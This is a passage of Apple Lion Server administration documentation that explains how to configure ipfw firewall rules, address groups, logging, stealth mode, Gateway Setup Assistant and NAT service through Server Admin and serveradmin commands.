5. Click the Add button (+). Alternatively, you can s elect a rule similar to the one you want to create, click Duplicate, and then click Edit. 6. In the Action pop-up menu, select whether this rule permits or denies access. If you choose Other, enter the action des ired (for example, log). 7. From the Protocol pop-up menu, choose a protocol. If you choose Other, enter the protocol des ired (for example, icmp, es p, ipencap). 8. From the Service pop-up menu, choos e a service. To s elect a nons tandard service port, choos e Other. 9. If needed, choos e to log all packets that match the rule. 10. For the source of filtered traffic, choose an address group from the Source:Addres s pop-up menu. If you dont want to use an existing addres s group, choose Other and enter the s ource IP addres s range (using CIDR notation) to filter. If you want it to apply to any addres s, choose any from the pop-up menu. 11. If you selected a nonstandard s ervice port, enter the source port number. 12. For the des tination of filtered traffic, choose an address group from the Destination:Address pop-up menu. If you dont want to use an existing addres s group, choose Other and enter the destination IP address range (using CIDR notation). If you want it to apply to any addres s, choose any from the pop-up menu. 13. If you selected a nonstandard s ervice port, enter the destination port number. 14. From the Interface pop-up menu that this rule will apply to, choose In or Out. In refers to the packets being sent to the s erver. Out refers to the packets being sent from the server. 15. If you select Other, enter the interface name (en0, en1, fw1, and so on). 16. Click OK. 17. Click Save to apply the rule immediately.
Firew all serv ice
About firewall rules in the ipfw configuration file

An ipfw configuration, or rules et, is made of a lis t of rules numbered from 1 to 65535. The file where you can define your rules is /etc/ipfilter/ipfw.conf. Firewall service reads this file but does nt modify it. Its contents are annotated and include commented-out rules you can us e as models. Packets are pas sed to ipfw from a number of places in the protocol stack. (Depending on the s ource and destination of the packet, ipfw can be invoked multiple times on the same packet.) The packet pas sed to the firewall is compared with each rule in the firewall rules et. When a match is found, the action corresponding to the matching rule is performed. Important: Mis configuring the firewall can put your computer in an unusable s tate, possibly shutting down network services and requiring cons ole access to regain control of it. You can configure ipfw with a variety of commands. For information about command-line parameters , see Firewall command-line parameters . For information about serveradmin and ipfw, see their man pages.
Firew all serv ice
Edit or delete advanced firewall rules
You can remove or edit advanced firewall rules. If you think youll use a rule again and only want to disable it, you can des elect the rule rather than deleting it. If you edit a rule after turning on Firewall service, your changes affect connections established with the server. For example, if computers are connected to your web server and you change the rule to deny all access to the server, connected computers are disconnected.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Advanced. 5. To edit the services lis t, click the Edit button (/) below the Advanced Rules lis t, edit the rule as needed, and then click OK. 6. To delete a rule, click the Delete button () below the Advanced Rules list. Default rules, designated by the lock icon, cannot be edited or deleted. 7. Click Save.
Firew all serv ice
Edit or delete items in the services list

You can remove or edit ports in the Services lis t. This enables you to cus tomize service choices for your convenience.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Services. 5. Select the service you want to change, then do the following: a. To edit the service list, click the Edit button (/) below the services list. b. To delete the s ervice list, click the Delete button () below the s ervices list. 6. Edit the name, port, or protocol as needed, and click OK. 7. Click Save.
Firew all serv ice
Configure for standard services (CLI)

By default, Firewall service permits UDP connections and blocks incoming TCP connections on ports that are not ess ential for remote administration of the server. Also, by default, stateful rules are in place that permit specific res pons es to outgoing requests. Before you turn on Firewall service, make sure youve set up rules permitting acces s from IP address es you choose; otherwise, no one can acces s your server. You can easily permit standard services through the firewall without advanced and extensive configuration. Standard services include: SSH access Web service Apple File service Windows File service
DNS/Multicast DNS ICMP Echo Reply (incoming pings ) IGMP PPTP VPN L2TP VPN iTunes Music Sharing Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.
Parameter setting value Description An
ipfilter service setting. See Firewall command-line parameters.
A value for the setting.
To view a setting: $ sudo serveradmin settings ipfilter: setting To view a group of settings: $ sudo serveradmin settings ipfilter:ipAddressGroups:* Enter as much of the name as you want, s topping at a colon (:), and then entering an asterisk (*) as a wildcard for the remaining parts of the name. To view all service configuration settings : $ sudo serveradmin settings ipfilter To change a setting: $ sudo serveradmin settings ipfilter: setting= value To change several s ettings: $ sudo serveradmin settingsipfilter: setting= valueipfilter: setting= valueipfilter: setting= value[...]Control-D
Firew all serv ice
Configure for standard services

By default, Firewall service permits UDP connections and blocks incoming TCP connections on ports that are not ess ential for remote administration of the server. Also, by default, stateful rules are in place that permit specific res pons es to outgoing requests. Before you turn on Firewall service, make sure youve set up rules permitting acces s from IP address es you choose; otherwise, no one can acces s your server. You can easily permit standard services through the firewall without advanced and extensive configuration. Standard services include: SSH access Web service Apple File service Windows File service DNS/Multicast DNS ICMP Echo Reply (incoming pings ) IGMP PPTP VPN L2TP VPN iTunes Music Sharing
Important: If you add or change a rule after starting Firewall service, the new rule affects connections established with the server. For example, if you deny all access to your FTP server after starting Firewall service, computers connected to your FTP server are disconnected.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Services. 5. From the Editing Services for pop-up menu, select an address group. 6. For the address group, choose to permit all traffic from any port or to permit traffic on designated ports . 7. For each service you want the address group to use, select Allow. If you dont see the s ervice you need, add a port and des cription to the services lis t. To create a custom rule, s ee Configure advanced firewall rules (CLI) or Configure advanced firewall rules . 8. Click Save.
Firew all serv ice
Add to the services list

You can add custom ports to the Services list. This enables you to open specific ports to addres s groups without creating an advanced IP rule.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Services. 5. Below the services list, click the Add button (+). 6. Enter a rule name for the service. 7. Enter a single port (for example, 22) or a port range (for example, 650-750). 8. Choose a protocol. If you want a protocol other than TCP or UDP, use the Advanced s ettings to create a cus tom rule. 9. Click OK 10. Click Save.
Firew all serv ice
Enable stealth mode

You can hide your firewall by choosing not to send a connection failure notification to any connection that is blocked by the firewall. This is called stealth mode and it effectively hides your s ervers closed ports. For example, if a network intruder tries to connect to your s erver, even if the port is blocked, he or s he knows that there is a server and can find other ways to intrude. If stealth mode is enabled, instead of being rejected, the hacker wont receive notification that an attempted connection took place.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Advanced. 5. Select Enable for TCP, Enable for UDP, or both, as needed. 6. Click Save.
Firew all serv ice
Change the order of advanced firewall rules

The priority level of an advanced firewall rule is determined by its order in the Advanced Rules list. Default rules that are locked cannot be reordered in the list.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Advanced. 5. Drag the rules to reorder them in the needed sequence. Default rules, which are designated by the lock icon, cannot be reordered. 6. Click Save.
Firew all serv ice
Configure address groups settings

You can define groups of IP addresses for firewall rules. Then you can use thes e groups to organize and target the rules. The any address group is for all addresses. Two other IP address groups are present by default, intended for the entire 10-net range of private addresses and the entire 192.168-net range of private addres ses. Addresses can be listed as individual addres ses (192.168.2.2), IP addres ses and subnet mask in CIDR notation (192.168.2.0/24), or IP addresses and s ubnet mask in netmask notation (192.168.2.0:255.255.255.0).
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Address Groups. 5. Below the Address Group pane, click the Add button (+). 6. In the Group name field, enter a group name. 7. Use the Add (+) and Delete button ()s to the enter the IP addres ses you want the rules to affect. To indicate any IP address, use the word any. 8. Click OK. 9. Click Save.
Firew all serv ice
Create an address group

Use Server Admin to create address groups for Firewall service.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Address Groups. 5. Below the IP Address Groups list, click the Add button (+). 6. In the Group name field, enter a group name. 7. Use the Add (+) and Delete button ()s to enter the address es and s ubnet mas k you want the rules to affect. To indicate any IP address, use the word any. 8. Click OK. 9. Click Save.
Firew all serv ice
Duplicate an address group

You can duplicate addres s groups from your firewall rule lis t. This can help speed configuration of similar address groups.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Address Groups. 5. From the IP Address Groups list, select the group name. 6. Below the IP Address Groups list, click the Duplicate button. 7. Make the required modifications and click OK. 8. Click Save.
Firew all serv ice
Edit or delete an address group

You can edit addres s groups to change the range of IP addresses affected. The default address group is for all addresses. You can remove address groups from your firewall rule list. The rules associated with thos e addres ses are also deleted. Addresses can be listed as individual addres ses (192.168.2.2), IP addres s and network mask in CIDR notation (192.168.2.0/24), or IP address and network mask in netmas k notation (192.168.2.0:255.255.255.0).
The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Address Groups. 5. From the IP Address Groups list, select the group name. 6. To edit an IP address group, click the Edit button (/) below the list, edit the Group name or address es as needed, and then click OK. 7. To delete an IP address group, click the Delete button () below the list. 8. Click Save.
Firew all serv ice
Monitoring firew alls
Configure firewall logging settings

You can choos e the types of packets to log. You can log the packets that are denied access, the packets that are permitted access, or both. Each logging option can generate many log entries, but you can limit the volume of entries by: Logging only permitted packets or denied packets, ins tead of all packets Logging packets only as long as necessary Using the Logging Settings pane to limit the total number of packets Adding a count rule in the Advanced Settings pane to record the number of packets that match the characteristics youre interested in measuring
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Logging. 5. Select the Enable logging checkbox and choose to log permitted packets , denied packets , or a designated number of packets . 6. Click Save.
Firew all serv ice
Check the status of Firewall service (CLI)

Use Server Admin to check the s tatus of Firewall service. For information about serveradmin, see its man page.
See s ummary status of the service: sudo serveradmin status ipfilter See detailed status of the service, including rules: sudo serveradmin fullstatus ipfilter
Firew all serv ice
Check the status of Firewall service
Use Server Admin to check the s tatus of Firewall service.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Overview to s ee whether the service is running, the number of active static and dynamic rules configured, the number of matching packets, and the number of bytes in matching packets handled by the firewall. 5. Click Log to review the Firewall service log. To s earch for s pecific entries, use the Filter field above the log. 6. To view a list of active firewall rules , click Active Rules. A lis t of rules appears, with a des cription of each rule in ipfw code format, the priority, packet count, and total bytes handled.
Firew all serv ice
View firewall active rules

Use Server Admin to view a s imple summary of active firewall rules. The Active Rules pane shows the number of packets and bytes associated with each rule. When a change is made to the configuration of the firewall us ing Server Admin, the old firewall rules are flushed, new rules are generated and s aved in a file, and the ipfw command is invoked to load the rules into service. As part of the flush operation, the number of packets and bytes ass ociated with each rule are cleared. The Active Rules pane provides a snapshot of the state of the firewall. When viewing this pane, dynamic rules might be shown with static rules . Dynamic rules come and go in a matter of seconds, in res pons e to network activity. They are the result of rules that include a keepstate claus e (s tateful rules). The Active Rules pane shows the rule number of the stateful rule that was triggered to create the dynamic rule.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Active Rules. A lis t of the rules appears, with a description of each rule in ipfw code format, the priority, packet count, and total bytes handled.
Firew all serv ice
View denied packets

Viewing denied packets can help you identify problems and troubleshoot Firewall s ervice.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Logging.
5. Make sure Log all denied packets is selected. If you have not turned on logging for a rule, s ee Edit or delete advanced firewall rules. 6. To view log entries , click Log. 7. In the text filter box, enter the word unreach.
Firew all serv ice
View the Firewall service log (CLI)

Each rule you set up in Server Admin corresponds to rules in the underlying firewall s oftware. Log entries s how you when the rule was applied, the IP address of the client and server, and other information. The log view shows the contents of /var/log/ipfw.log. See examples at Firewall log examples.
See where the ipfilter service log is located. sudo serveradmin command ipfilter:command = getLogPathsipfilter:systemLog = "/var/log/ipfw.log" View the latest entries in the log: sudo taillog-file
Firew all serv ice
View the Firewall service log

Each rule you set up in Server Admin corresponds to rules in the underlying firewall s oftware. Log entries s how you when the rule was applied, the IP address of the client and server, and other information. The log view shows the contents of /var/log/ipfw.log. See examples at Firewall log examples.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Log. To s earch for s pecific entries, use the Filter field above the log. You can refine the view using the text filter box.
Firew all serv ice
View packets logged by firewall rules

Viewing the packets filtered by firewall rules can help you identify problems and troubleshoot Firewall s ervice.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Firewall. 4. Click Settings, then click Logging. 5. Make sure Log all allowed packets is s elected. If you have not turned on logging for a rule, s ee Edit or delete advanced firewall rules. 6. To view log entries , click Log.
7. Enter the word Accept in the text filter box.
Firew all serv ice
Firewall log examples

The filters you create in Server Admin correspond to rules in the underlying filtering software. Log entries show you the rule applied, the IP addres s of the client and s erver, and other information. For information about tail and serveradmin, s ee their man pages . Log example 1 Dec 12 13:08:16 ballch5 mach_kernel: ipfw: 65000 Unreach TCP 10.221.41.33:2190 192.168.12.12:80 in via en0 This entry shows that Firewall service used rule 65000 to deny (unreach) the remote client at 10.221.41.33:2190 from accessing server 192.168.12.12 on Web port 80 through Ethernet port 0. Log example 2 Dec 12 13:20:15 mayalu6 mach_kernel: ipfw: 100 Accept TCP 10.221.41.33:721 192.168.12.12:515 in via en0 This entry shows that Firewall service used rule 100 to permit the remote client at 10.221.41.33:721 to acces s the server 192.168.12.12 on the LPR printing port 515 through Ethernet port 0. Log example 3 Dec 12 13:33:15 smithy2 mach_kernel: ipfw: 10 Accept TCP 192.168.12.12:49152 192.168.12.12:660 out via lo0 This entry shows the NAT divert rule applied to an outbound packet. In this case it diverts the rule to service port 660, which is the port the NAT daemon uses .
Firew all serv ice
Adv anced firew all topics
Troubleshoot advanced firewall rules

Advanced firewall configuration settings accept any input, ass uming you are correctly configuring a rule. Errors are not noticed until the rules are s aved and Server Admin applies all rules using the ipfw command. Then, the firs t rule with a syntax error causes the operation to stop, and an error message is logged. This error mes sage does not indicate which rule is invalid, but all valid rules before the invalid one are loaded in the firewall. The following section describes how you can determine which rule is invalid.
1. Read the error message in the log. 2. Wait a few minutes for Server Admin to s how the active rules in the Firewall Overview pane. 3. Compare the list of active rules in the Firewall Overview pane with the rule lis t in the Settings section. 4. Inspect the contents of /etc/ipfilter/ipfw.conf.apple file to s ee which rules Server Admin tried to load in the firewall. The first rule in the file that is not present in the Firewall Overview pane is likely the invalid one. However, there might be more invalid rules after that one. 5. If the rule corresponds to one from the Advanced Settings pane, dis able it or correct it. Disabled rules appear in the /etc/ipfilter/ipfw.conf.apple file preceded by a comment character so they are not processed by the ipfw tool.
Firew all serv ice
Disable Firewall service (CLI)

You can disable Firewall service using Terminal.
In Terminal, enter the following at the command line: sudo /usr/sbin/sysctl -w net.inet.ip.fw.enable=0
Firew all serv ice
Reset the firewall to the default setting

A server can become unreachable for remote administration due to an error with the firewall configuration. In s uch a case, you must res et the firewall to its default state so Server Admin can acces s the server. This recovery procedure requires you to use the command-line interface and must be done by an administrator who has physical access to the server.
1. Disconnect the s erver from the Internet. 2. Res tart the server in s ingle-user mode by holding down the Commands keys during s tartup. 3. Remove or rename the address groups file found at /etc/ipfilter/ip_address_groups .plist. 4. Remove or rename the ipfw configuration file found at /etc/ipfilter/ipfw.conf. 5. Force-flush the firewall rules by entering the following in Terminal: sudo ipfw -f flush 6. Edit the /etc/hostconfig file and set IPFILTER=-YES-. 7. Complete the startup sequence in the login window by entering exit: The computer starts up with the default firewall rules and firewall enabled. Use Server Admin to refine the firewall configuration. 8. Log in to your s ervers local administrator account to confirm that the firewall is restored to its default configuration. 9. Reconnect your host to the Internet.
Gatew ay Setup Assistant
About Gateway Setup Assistant

Gateway Setup As sistant helps you eas ily s et up a Mac server to share your Internet connection with your local network. After you configure a few settings , the ass is tant can start s haring the server connection. Depending on your configuration choices, the assistant performs the following when it sets up the server: Ass igns the server a static IP address for each internal network interface. The address assigned is 192.168.x.1. The value used for x is determined by the network interfaces order in the Network Sys tem Preference pane. For example, for the first interface on the list, x is 0; for the s econd interface, x is 1. Enables DHCP to allocate addresses on the internal network, removing existing DHCP subnets. Sets aside s pecific internal (192.168.x.x) addresses for DHCP use. Without VPN s tarted, each interface can allocate addres ses from 192.168.x.2 to 192.168.x.254. (Optional) Enables VPN to permit authorized external clients to connect to the local network. VPN L2TP is enabled, so you mus t enter a shared secret (a passphrase) for client connections to use. Sets aside s pecific internal address es (192.168.x.x) for VPN us e. If VPN is selected, half of the allotted IP addres ses in the DHCP range are res erved for VPN connections. The addres ses 192.168.x.128192.168.x.254 are allotted to VPN connections. Enables the firewall to help s ecure the internal network. Addres s groups are added for each internal network interface, with all traffic permitted from the newly created DHCP address ranges to any des tination address .
Enables network address translation (NAT) on the internal network and adds a NAT divert rule to the IP firewall to direct network traffic to the correct computer. This als o protects the internal network from uns olicited external connections . Enables DNS on the server, configured to cache lookups, to improve DNS res pons e for internal clients. When configuring these settings , you can review the propos ed changes before committing to them and overwriting exis ting settings. You can make further changes to the service configuration us ing Server Admin. For network services, s ee the relevant s ection in this book for information. If you run the Gateway Setup Ass is tant again, it overwrites manual settings you made. To us e the Setup As sistant, see Run Gateway Setup Assistant.
Run Gateway Setup Assistant

You run Gateway Setup Assistant from the NAT Service Overview pane in Server Admin. Gateway Setup As sistant requires two network interfaces. For example, if you have a Mac mini with Lion Server, you may want to connect an Apple USB Ethernet adapter or equivalent before running Gateway Setup Ass is tant. For more information about Gateway Setup Assistant, see About Gateway Setup As sistant.
1. Open Server Admin and connect to the s erver. 2. Click Settings, then click Services. 3. Select the NAT checkbox, then click Save. 4. Click the triangle at the left of the server. The list of s ervices appears . 5. From the expanded Servers list, select NAT. 6. Click Overview 7. Click Gateway Setup Assistant. 8. Follow the directions in the ass is tant, click Continue after each page, read the final configuration s ummary carefully, and make sure you approve of the s ettings before finalizing the configuration. WARNING: Although you can us e the Gateway Setup Ass is tant to configure remote servers, you can accidentally cut off your administrator access to the remote server after the gateway is complete. This can happen becaus e the firewall is enabled and may deny remote access to the server. To prevent this , make sure your firewall is configured to permit remote access.
Connect a wireless LAN to the Internet

Connecting wireless clients to the Internet through a Mac server gateway provides the following advantages over using AirPort Bas e Station built-in functions: Advanced firewall control DHCP allocation of static IP addresses DNS caching Incoming VPN connections to the LAN If you do not need these advanced functions, use the AirPort Base Station to connect your wireless clients to the Internet without using Mac server between the Bas e Station and the Internet. To take advantage of the gateways features, you use the Bas e Station as a bridge between your wireless clients and the gateway. Each client connects to the Base Station, and the Base Station sends network traffic through the gateway.
Wireless clients must be able to connect to the AirPort Base Stations wireless network to be linked to the gateway. After this process, computers connected to the AirPort Base Station: Can get IP addres ses and network settings configured us ing DHCP Can acces s the Internet if the gateway is connected to the Internet Cant be access ed by unauthorized network connections originating from the wired connection to the Internet Can be accessed over the Internet by authorized VPN clients (if VPN is configured) Can benefit from DNS lookup caching in the gateway, which speeds DNS resolution
1. Plug the connection to the Internet into the Ethernet 1 (en0) port. 2. Connect the AirPort Bas e Station port (the WAN port, if there are two) to the Ethernet 2 (en1) port. 3. Connect the AirPort Bas e Station port (the WAN port, if there are two) to the Ethernet 2 (en1) port. You can open it from the /Applications/Utilities / folder. 4. Select a Base Station and then choose Manual Setup from the Base Station menu. 5. Enter the Base Station password if necessary. 6. Click Internet in the toolbar, then click Internet Connection. 7. From the Connect Using pop-up menu, choose Ethernet. 8. From the Configure IPv4 pop-up menu, choos e Using DHCP. 9. From the Connection Sharing pop-up menu, choos e Off (Bridge Mode). 10. To change Bas e Station s ettings, click Update. 11. Open Server Admin and connect to the s erver. 12. Click Settings, then click Services. 13. Select the NAT checkbox. 14. Click Save. 15. Click the triangle at the left of the server. The list of s ervices appears . 16. From the expanded Servers list, select NAT. 17. Click Overview, then click Gateway Setup As sistant. 18. Click Continue. 19. For your WAN (Internet) interface, designate Built-In Ethernet 1. 20. For your LAN (sharing) interface, des ignate Built-In Ethernet 2. Your LAN interface is the one connected to your local network. Computers on the LAN s hare the servers Internet connection through the s ervers WAN interface. If your s erver has more than one interface available (Ethernet port 2, Ethernet port 3, and so on), choose thos e you want to enable. 21. Choose whether to make this gateway a VPN entry point to your LAN. If you enable VPN, you need a shared secret. A shared s ecret is a passphrase that users mus t provide to s ecurely connect to the VPN gateway. It should be a very secure passphrase, not a password of a user or administrator on the gateway server. To s et a very secure pass phrase, us e Pass word Ass istant in Account Preferences. 22. Inspect and confirm the changes . You can fine-tune the settings from this bas e configuration but you perform additional configuration in Server Admin. For example, you can use Server Admin to as sign IP address es to specific computers. To do this, add static addres s mappings in
the DHCP sections Settings tab. For more information, see Us e DHCP to assign s tatic IP addres ses. You can also change firewall s ettings to permit connections from the Internet to the LAN. To do this, change the firewall settings, opening up IP ports as needed, and configure port forwarding in the NAT pane to des ignate which computer on the LAN is to accept incoming traffic.
Connect a wired LAN to the Internet

You can us e Gateway Setup Ass is tant to connect a wired LAN to the Internet. Your LAN can consist of any number of computers connected to each other through Ethernet hubs and switches, but the LAN must have one point of contact with the Internet (the gateway). Your gateway has one connection to the Internet and one connection to the LAN. All other computers acces s the Internet through your gateway. You can configure your Mac s erver to be a gateway to the Internet, which requires that your server have two Ethernet ports (en0 and en1). Port en0 should be connected to the Internet and en1 s hould be connected to your LAN. After this process, computers on the LAN: Can get IP addres ses and network settings that were configured using DHCP Can acces s the Internet if the gateway is connected to the Internet Cant be access ed by unauthorized network connections originating from the Internet Can be accessed over the Internet by authorized VPN clients (if VPN is configured) Can benefit from DNS lookup caching in the gateway, which speeds DNS resolution
1. Plug the connection to the Internet into the Ethernet 1 (en0) port. 2. Plug the connection to your LAN into the Ethernet 2 (en1) port. 3. Open Server Admin and connect to the s erver. 4. Click Settings, then click Services. 5. Select the NAT checkbox. 6. Click Save. 7. Click the triangle at the left of the server. The list of s ervices appears . 8. From the expanded Servers list, select NAT. 9. Click Overview, then click Gateway Setup As sistant. 10. Click Continue. If your s erver has existing DHCP, DNS, NAT, and VPN configurations, you are prompted to overwrite those configurations. To overwrite configurations , click Overwrite to continue. 11. From the Gateway WAN Interface pop-up menu, choose Ethernet 1 (en0) for your WAN interface, then click Continue. 12. From the list of network interfaces, select the Ethernet 2 checkbox for you LAN interface and click Continue. Your LAN interface is the one connected to your local network. Computers on the LAN s hare the servers Internet connection through the s ervers WAN interface. If your s erver has more than one interface available (Ethernet port 2, Ethernet port 3, and so on), choose thos e you want to enable. 13. (Optional) To make your gateway s erver a VPN entry point to your LAN, select Enable VPN for this server. If you enable VPN, you need a shared secret. A shared s ecret is a passphrase that users provide to connect to the VPN gateway. It should be a very secure passphrase, not the pas sword of a user or adminis trator on the gateway server. To s et a very secure pass phrase, us e Pass word Ass istant in Account Preferences. For more information, s ee Mac OS X Server Security Configuration.
14. Click Continue. 15. Inspect and confirm your setup. 16. Click Continue. NAT and all dependent services will be configured and s tarted. 17. Click Close.
Connect a wired LAN and wireless clients to the Internet

You can us e Gateway Setup Ass is tant to connect a wired LAN and wireles s clients to the Internet. Your LAN can consist of any number of computers connected to each other through Ethernet hubs and switches , but the LAN mus t have one point of contact with the Internet (the gateway). Your LAN mus t also have an AirPort Base Station to connect the wireless computers to the wired network. Your wireless clients must be able to connect to the AirPort Base Stations wireless network to be linked to the wired LAN. After this process, computers on the LAN and those connected to the AirPort Base Station: Can get IP addres ses and network settings configured us ing DHCP Can acces s the Internet, if the gateway is connected to the Internet Cant be access ed by unauthorized network connections originating from the wired connection to the Internet Can be accessed over the Internet by authorized VPN clients (if VPN is configured) Can benefit from DNS lookup caching in the gateway, which speeds DNS resolution
1. Plug the connection to the Internet into the Ethernet 1 (en0) port. 2. Plug the connection to your LAN into the Ethernet 2 (en1) port. 3. Connect the AirPort Bas e Station port (the WAN port, if there are two) to the wired network. 4. Using AirPort Utility, configure the Base Station to connect using Ethernet and to get its address using DHCP. You can open it from the /Applications/Utilities / folder. 5. Select the Base Station and then choose Manual Setup from the Base Station menu. 6. Enter the Base Station password if necessary. 7. Click Internet in the toolbar, then click Internet Connection. 8. From the Connect Using pop-up menu, choose Ethernet. 9. From the Configure IPv4 pop-up menu, choos e Using DHCP. 10. From the Connection Sharing pop-up menu, choos e Off (Bridge Mode). 11. To change Bas e Station s ettings, click Update. 12. Open Server Admin and connect to the s erver. 13. Click Settings, then click Services. 14. Select the NAT checkbox. 15. Click Save. 16. Click the triangle at the left of the server. The list of s ervices appears . 17. From the expanded Servers list, select NAT. 18. Click Overview, then click Gateway Setup As sistant. 19. Click Continue.
20. For your WAN (Internet) interface, designate Ethernet 1. 21. For your LAN (sharing) interface, des ignate Ethernet 2. Your LAN interface is the one connected to your local network. Computers on the LAN s hare the servers Internet connection through the s ervers WAN interface. If your s erver has more than one interface available (Ethernet port 2, Ethernet port 3, and so on), choose thos e you want to enable. 22. Choose whether to make this gateway a VPN entry point to your LAN. If you enable VPN, you need a shared secret. A shared s ecret is a passphrase that users mus t provide to s ecurely connect to the VPN gateway. It should be a very secure passphrase, not a password of a user or administrator on the gateway server. To s et a very secure pass phrase, us e Pass word Ass istant in Account Preferences. 23. Inspect and confirm the changes .
NAT
About NAT
Network Address Trans lation (NAT) is a protocol you use to give multiple computers acces s to the Internet using only one ass igned public or external IP address. NAT permits you to create a private network that acces ses the Internet through a NAT router or gateway. NAT is sometimes referred to as IP masquerading. The NAT router takes traffic from your private network and remembers internal address es that have made requests. When the NAT router receives a response to a request, it forwards it to the originating computer. Traffic that originates from the Internet does not reach computers behind the NAT router unless port forwarding is enabled. Enabling NAT on a Lion Server often requires detailed control over DHCP, so DHCP is configured s eparately in Server Admin. To learn more about DHCP, see DHCP s etup overview. Enabling NAT also creates a divert rule in the firewall configuration. Server Admin permits NAT s ervice and Firewall service to be enabled and dis abled independently. However for NAT service to function, NAT service and Firewall s ervice mus t be enabled. This is because an essential part of NAT is the packet divert rule. That rule is added to the firewall when NAT service is enabled, but Firewall service must be turned on for the packet divert rule, or any firewall rule, to have effect. The natd daemon process controls NAT service. For information about how to acces s natd features and implement them, see the natd man page. Request for Comments (RFC) documents provide an overview of a protocol or service and details about how the protocol should behave. If youre a novice s erver administrator, youll probably find some of the background information in an RFC helpful. If youre an experienced s erver administrator, you can find the technical details about a protocol in its RFC document. You can search for RFC documents by number at www.ietf.org/rfc.html. For NAT descriptions, s ee: RFC 1631 RFC 3022
NAT
NAT LAN configuration overview

To configure a network segment as a NAT LAN, you must complete several steps . Each is necessary to create a functioning private network behind a NAT gateway. A detailed example of the setup is found in Link a LAN to the Internet through one IP address. You can also configure NAT us ing Gateway Setup Assis tant, which configures each of these s ervices and starts NAT. For more information, see About Gateway Setup Assistant. The following provides an overview of the configuration process .
Choose your NAT gateway and interface functions You mus t locate the NAT gateway on a Lion Server computer with at leas t two network interfaces: one to connect to the Internet (the WAN port), and one to connect to your private network segment (the LAN port). Decide how NAT LAN clients get IP addresses You can as sign your own s tatic IP address in the approved ranges for private LANs or you can use Lion Servers DHCP feature to ass ign addres ses for you. Configure the gateways network settings You assign your public IP address to the WAN port and you ass ign your internal gateways addres s to the LAN port. Enable NAT service Before configuring NAT service, you must turn NAT on. See Enable NAT service. Configure NAT settings Use the NAT s ettings to s et the network interface. See Configure NAT service. Configure port forwarding settings Use the Terminal application to direct incoming traffic to your NAT network to a specific IP address behind the NAT gateway. See Configure port forwarding. Start NAT service After you configure NAT, s tart the s ervice to make it available. See Start or stop NAT service. Start Firewall service For NAT service to operate, you mus t enable NAT service and Firewall service. See Enable firewall administration. (Conditional) Configure and start DHCP service If clients have their addresses dynamically ass igned, configure DHCP and start it now. See DHCP setup overview.
NAT
Start or stop NAT service

You use Server Admin to start and stop NAT service on your default network interface. Starting NAT service does not start DHCP on the NAT interface, so you must manage LAN addressing separately. Starting NAT service is not the same as configuring a network s egment as a NAT LAN. For NAT service to operate, you mus t enable NAT service and Firewall service. For more information, see Enable firewall administration.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select NAT. 4. Click the Start NAT button below the Servers list. When the s ervice is running, the Stop NAT button is available.
NAT
NAT command-line settings

To manage NAT s ervice, use the following commands with the serveradmin tool.
Command (nat:command=) Description Find the location of the log used by NAT service.
getLogPaths
updateNATRuleInIpfw
Update the firewall rules defined in the changes in NAT settings.
ipfilter service to reflect
writeSettings
Equivalent to the standard
serveradmin settings command, but
also returns a setting indicating whether the service must be restarted.
NAT
NAT service settings

To change settings for NAT s ervice, use the following parameters with the serveradmin tool.
Parameter
(nat:)
Description
deny_incoming
yes|no
Default =
no
log_denied
yes|no
Default =
no
clamp_mss
yes|no
Default =
yes
reverse
yes|no
Default =
no
log
yes|no
Default =
yes
proxy_only
yes|no
Default =
no
dynamic
yes|no
Default =
yes
use_sockets
yes|no
Default =
yes
interface
yes|no
Default =
en0
unregistered_only
yes|no
Default =
no
same_ports
yes|no
Default =
yes
NAT
Configure NAT
Enable NAT service
Before you can configure NAT settings , you must enable NAT service in Server Admin.
1. Open Server Admin and connect to the s erver. 2. Click Settings. 3. Click Services. 4. Select the NAT checkbox. 5. Click Save.
NAT
Configure NAT
Configure NAT service

You use Server Admin to indicate which network interface is connected to the Internet or other external network. Configuring NAT s ervice is not the same as configuring a network segment as a NAT LAN.
